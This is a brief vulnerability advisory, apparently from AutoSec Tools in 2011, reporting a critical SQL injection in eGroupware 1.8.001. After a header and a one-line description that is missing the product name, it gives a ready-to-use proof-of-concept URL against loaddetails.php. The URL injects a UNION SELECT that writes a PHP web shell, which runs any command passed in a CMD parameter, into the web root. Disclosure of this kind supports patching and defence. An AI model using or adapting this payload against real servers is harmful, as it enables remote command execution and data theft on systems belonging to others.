------------------------------------------------------------------------
Software................eGroupware 1.8.001
Vulnerability...........SQL Injection
Threat Level............Critical (4/5)
Download................http://www.egroupware.org/
Discovery Date..........4/7/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A SQL injection vulnerability in  can be exploited to extract
arbitrary data. In some environments it may be possible to create a
PHP shell.


--PoC--

http://localhost/egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0%20UNION%20SELECT%20'%3C?php%20system($_GET[%22CMD%22]);%20?%3E','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23